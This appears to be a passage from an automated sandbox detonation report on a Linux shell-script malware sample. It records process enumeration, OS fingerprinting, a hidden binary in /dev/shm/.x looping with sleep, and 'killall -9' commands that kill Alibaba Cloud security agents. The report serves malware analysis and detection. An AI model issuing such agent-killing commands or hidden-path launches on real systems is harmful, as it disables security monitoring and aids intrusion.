
/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

/dev/shm/.x/secure

[/dev/shm/.x/secure]

/bin/sleep

[sleep 10]

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-27 05:48

Reported

2024-11-27 05:52

Platform

debian9-mipsel-20240418-en

Max time kernel

2s

Command Line

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

Signatures

Enumerates running processes

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/733/cmdline /usr/bin/killall N/A
File opened for reading /proc/708/cmdline /usr/bin/killall N/A
File opened for reading /proc/713/cmdline /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/331/stat /usr/bin/killall N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/708/cmdline /usr/bin/killall N/A
File opened for reading /proc/123/cmdline /usr/bin/killall N/A
File opened for reading /proc/17/stat /usr/bin/killall N/A
File opened for reading /proc/157/stat /usr/bin/killall N/A
File opened for reading /proc/230/stat /usr/bin/killall N/A
File opened for reading /proc/12/stat /usr/bin/killall N/A
File opened for reading /proc/334/stat /usr/bin/killall N/A
File opened for reading /proc/707/cmdline /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/76/stat /usr/bin/killall N/A
File opened for reading /proc/18/stat /usr/bin/killall N/A
File opened for reading /proc/733/stat /usr/bin/killall N/A
File opened for reading /proc/13/stat /usr/bin/killall N/A
File opened for reading /proc/151/stat /usr/bin/killall N/A
File opened for reading /proc/748/stat /usr/bin/killall N/A
File opened for reading /proc/329/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/6/stat /usr/bin/killall N/A
File opened for reading /proc/333/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/694/stat /usr/bin/killall N/A
File opened for reading /proc/171/stat /usr/bin/killall N/A
File opened for reading /proc/14/stat /usr/bin/killall N/A
File opened for reading /proc/707/cmdline /usr/bin/killall N/A
File opened for reading /proc/70/stat /usr/bin/killall N/A
File opened for reading /proc/707/cmdline /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/3/stat /usr/bin/killall N/A
File opened for reading /proc/677/stat /usr/bin/killall N/A
File opened for reading /proc/731/stat /usr/bin/killall N/A
File opened for reading /proc/707/stat /usr/bin/killall N/A
File opened for reading /proc/432/stat /usr/bin/killall N/A
File opened for reading /proc/15/stat /usr/bin/killall N/A
File opened for reading /proc/75/stat /usr/bin/killall N/A
File opened for reading /proc/123/stat /usr/bin/killall N/A
File opened for reading /proc/72/stat /usr/bin/killall N/A
File opened for reading /proc/8/stat /usr/bin/killall N/A
File opened for reading /proc/671/stat /usr/bin/killall N/A
File opened for reading /proc/151/stat /usr/bin/killall N/A
File opened for reading /proc/730/stat /usr/bin/killall N/A
File opened for reading /proc/37/stat /usr/bin/killall N/A
File opened for reading /proc/678/stat /usr/bin/killall N/A
File opened for reading /proc/5/stat /usr/bin/killall N/A
File opened for reading /proc/708/cmdline /usr/bin/killall N/A
File opened for reading /proc/713/cmdline /usr/bin/killall N/A
File opened for reading /proc/9/stat /usr/bin/killall N/A
File opened for reading /proc/73/stat /usr/bin/killall N/A
File opened for reading /proc/7/stat /usr/bin/killall N/A
File opened for reading /proc/71/stat /usr/bin/killall N/A
File opened for reading /proc/230/stat /usr/bin/killall N/A
File opened for reading /proc/677/stat /usr/bin/killall N/A
File opened for reading /proc/11/stat /usr/bin/killall N/A
File opened for reading /proc/331/stat /usr/bin/killall N/A
File opened for reading /proc/713/cmdline /usr/bin/killall N/A
File opened for reading /proc/20/stat /usr/bin/killall N/A
File opened for reading /proc/731/stat /usr/bin/killall N/A
File opened for reading /proc/77/stat /usr/bin/killall N/A
File opened for reading /proc/713/stat /usr/bin/killall N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/killall N/A

Processes

/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7

[/tmp/样本/Linux/sh恶意脚本/E4CC1A7F992909E8509520FDD6C9A3F7]

/bin/grep

[grep Gentoo]

/bin/grep

[grep Gentoo]

/bin/cat

[cat /etc/issue]

/usr/bin/killall

[killall -9 aegis_cli]

/usr/bin/killall

[killall -9 aegis_update]

/usr/bin/killall

[killall -9 AliYunDun]

/usr/bin/killall

[killall -9 AliHids]

/usr/bin/killall

[killall -9 AliHips]

/usr/bin/killall

[killall -9 AliYunDunUpdate]

Network

N/A

Files

N/A